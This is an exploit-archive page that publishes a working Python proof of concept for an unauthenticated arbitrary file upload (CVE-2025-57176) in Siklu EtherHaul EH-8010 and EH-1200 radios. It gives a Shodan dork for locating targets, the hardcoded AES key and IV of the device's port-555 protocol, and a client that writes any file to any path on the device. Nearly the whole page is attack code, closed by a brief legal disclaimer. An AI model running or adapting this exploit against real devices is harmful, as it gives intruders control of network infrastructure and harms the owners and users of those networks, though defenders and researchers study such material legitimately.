Skip to main content

Siklu EtherHaul Series EH-8010 – Arbitrary File Upload

Categories: WebApps

Siklu EtherHaul Series EH-8010 – Arbitrary File Upload

Proof of Concept (PoC)

poc.py
# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <[email protected]>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/

#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES

# TCP port this client connects to on the target.
PORT = 555
# Size in bytes of the fixed-length message header (0x90 == 144, a multiple
# of the 16-byte AES block size).
HDR_LEN = 0x90
# Initial CBC IV, packed as four little-endian 32-bit words (16 bytes).
# RFPipeSession starts both its send and its receive chain from this value.
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
# 32-byte key handed to AES.new (a 32-byte key selects AES-256).
KEY = bytes([
    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])

def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly *n* bytes from *sock*.

    Keeps calling ``sock.recv`` until *n* bytes have been collected, since a
    single ``recv`` may return fewer bytes than requested.

    Args:
        sock: Connected socket to read from.
        n: Number of bytes wanted; a value <= 0 yields ``b''`` without
            touching the socket.

    Returns:
        The *n* bytes read, in arrival order.

    Raises:
        ConnectionError: The peer closed the connection (``recv`` returned
            an empty result) before *n* bytes arrived.
    """
    pieces = []
    remaining = n
    while remaining > 0:
        piece = sock.recv(remaining)
        if not piece:
            raise ConnectionError('socket closed')
        pieces.append(piece)
        remaining -= len(piece)
    return b''.join(pieces)

def pad16_zero(b: bytes) -> bytes:
    """Return *b* right-padded with NUL (0x00) bytes to a multiple of 16.

    The result length is always a multiple of the 16-byte AES block size,
    which CBC-mode encryption requires.

    Args:
        b: Data to pad.

    Returns:
        *b* unchanged when its length is already a multiple of 16 (including
        the empty input); otherwise *b* followed by 1..15 zero bytes.
    """
    r = len(b) & 0x0F
    # The pad unit must be the single byte b'\x00'. The previous literal
    # b'x00' was three ASCII characters, which appended 3 * (16 - r) bytes of
    # "x00" text and usually left the result unaligned.
    return b if r == 0 else (b + b'\x00' * (16 - r))

def hdr_checksum(hdr: bytes) -> int:
    """Compute the additive checksum of a header buffer.

    Sums the byte values at offsets 0x00-0x0B and 0x10 up to ``HDR_LEN``,
    skipping the four bytes at 0x0C-0x0F, and truncates the sum to 32 bits.

    Args:
        hdr: Header bytes (``bytes`` or ``bytearray``).

    Returns:
        The byte sum as an unsigned 32-bit integer.
    """
    # Concatenate the two covered regions; 0x0C..0x0F is left out.
    covered = hdr[:0x0C] + hdr[0x10:HDR_LEN]
    return sum(covered) % (1 << 32)

def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
    """Build a plaintext message header of ``HDR_LEN`` bytes.

    Layout written by this function (all other bytes stay zero):
        0x00        flag, low 8 bits
        0x01        msg, low 8 bits
        0x08-0x0B   payload_len, little-endian uint32
        0x0C-0x0F   checksum from ``hdr_checksum``, little-endian uint32
        0x10-...    NUL-terminated path string

    Args:
        flag: Value for byte 0 (masked to 8 bits).
        msg: Value for byte 1 (masked to 8 bits).
        payload_len: Payload length field (masked to 32 bits).
        path: Path bytes; a NUL terminator is appended if not already there.

    Returns:
        The header as an immutable ``bytes`` object of length ``HDR_LEN``.
    """
    hdr = bytearray(HDR_LEN)
    hdr[0] = flag & 0xFF
    hdr[1] = msg & 0xFF
    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
    # The terminator must be the single byte b'\x00'. The previous literal
    # b'x00' appended the three ASCII characters "x00" to the path instead.
    p = path if path.endswith(b'\x00') else (path + b'\x00')
    max_path = HDR_LEN - 0x10
    # NOTE(review): a path longer than the field is silently truncated, which
    # also drops its NUL terminator; behaviour kept as in the original.
    field = p[:max_path]
    hdr[0x10:0x10 + len(field)] = field
    # The checksum is computed last so it covers every field written above.
    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
    return bytes(hdr)

class RFPipeSession:
    """AES-CBC state for one connection, with separate send/receive chains.

    Each direction keeps its own IV. After every message the IV for that
    direction is replaced by the last 16 bytes of the ciphertext just
    processed, so successive messages are chained together.
    """

    def __init__(self, key: bytes, iv0: bytes):
        # Both directions start from the same IV and then evolve separately.
        self.key = key
        self.send_iv = self.recv_iv = iv0

    def _decrypt_chained(self, ct: bytes) -> bytes:
        """Decrypt *ct* with the current receive IV, then advance that IV."""
        plain = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv).decrypt(ct)
        self.recv_iv = ct[-16:]
        return plain

    def enc_send(self, sock: socket.socket, data: bytes) -> None:
        """Encrypt *data* with the current send IV and write it to *sock*.

        The send IV is advanced to the last ciphertext block before the
        bytes are handed to ``sock.sendall``.
        """
        ciphertext = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv).encrypt(data)
        self.send_iv = ciphertext[-16:]
        sock.sendall(ciphertext)

    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
        """Receive and decrypt a body of *n_plain* plaintext bytes.

        Reads *n_plain* rounded up to a whole number of 16-byte blocks from
        *sock*, decrypts it, and returns only the first *n_plain* bytes.
        Returns ``b''`` without reading when *n_plain* <= 0.
        """
        if n_plain <= 0:
            return b''
        block_count = (n_plain + 15) // 16
        ciphertext = recv_exact(sock, 16 * block_count)
        return self._decrypt_chained(ciphertext)[:n_plain]

    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
        """Encrypt and send a header; raises ValueError on a wrong length."""
        if len(hdr_plain) == HDR_LEN:
            self.enc_send(sock, hdr_plain)
            return
        raise ValueError('header must be 0x90 bytes')

    def recv_header(self, sock: socket.socket) -> bytes:
        """Receive ``HDR_LEN`` ciphertext bytes and return the plaintext."""
        return self._decrypt_chained(recv_exact(sock, HDR_LEN))

def connect_any(host: str, port: int) -> socket.socket:
    """Open a TCP connection to *host*:*port*, trying every resolved address.

    Addresses are resolved with ``AF_UNSPEC`` so both IPv4 and IPv6 results
    are tried, in the order ``getaddrinfo`` returns them.

    Args:
        host: Host name or IPv4/IPv6 address.
        port: TCP port number.

    Returns:
        The first socket that connects successfully. The caller owns it and
        must close it.

    Raises:
        ConnectionError: No address could be connected to; the last
            underlying ``OSError`` is attached as ``__cause__``.
        OSError: Name resolution itself failed (raised by ``getaddrinfo``).
    """
    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    last_err = None
    for fam, st, proto, _, sa in infos:
        # Creating the socket can fail too (e.g. an IPv6 result on a host
        # without IPv6 support). Treat that like a failed connect and move on
        # to the next address instead of aborting the whole loop.
        try:
            s = socket.socket(fam, st, proto)
        except OSError as e:
            last_err = e
            continue
        try:
            s.connect(sa)
        except OSError as e:
            last_err = e
            s.close()
        else:
            return s
    raise ConnectionError(f'connect failed: {last_err}') from last_err

def main():
    """Command-line entry point: send one local file as a msg 0x04 request.

    Parses the arguments, reads the local file into memory, builds the
    header (flag 0x00, msg 0x04, payload length, remote path), and sends the
    encrypted header followed by the zero-padded encrypted payload to
    ``PORT`` on the target. With ``--recv`` it then reads one response
    header, prints its flag/msg/length fields, and prints the response body
    if one is announced.
    """
    ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
    ap.add_argument('target', help='IPv4/IPv6 address')
    ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
    ap.add_argument('--file', required=True, help='local file to send as payload')
    ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
    args = ap.parse_args()

    with open(args.file, 'rb') as f:
        payload = f.read()
    path_bytes = args.path.encode('utf-8')
    hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)

    sess = RFPipeSession(KEY, IV0)
    with connect_any(args.target, PORT) as s:
        sess.send_header(s, hdr_plain)
        # An empty file sends the header only; there is nothing to encrypt.
        if payload:
            sess.enc_send(s, pad16_zero(payload))
        if args.recv:
            rh = sess.recv_header(s)
            flag = rh[0]; rmsg = rh[1]
            rlen = struct.unpack_from('<I', rh, 0x08)[0]
            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
            # For these two message types no body is read, whatever the
            # length field says. NOTE(review): presumably header-only
            # ACK/status replies - confirm against the protocol.
            if rmsg in (0x03, 0x05):
                return
            if rlen:
                body = sess.dec_recv(s, rlen)
                # Strip one trailing NUL terminator. This must be the single
                # byte b'\x00'; the previous literal b'x00' never matched it.
                if body.endswith(b'\x00'):
                    body = body[:-1]
                try:
                    print(body.decode('utf-8', errors='replace'))
                except UnicodeError:
                    # Decoding with errors='replace' cannot fail, but print
                    # can if stdout cannot encode the text; fall back to hex.
                    print(body.hex())
# Run the client only when this file is executed as a script, not on import.
if __name__ == '__main__':
    main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...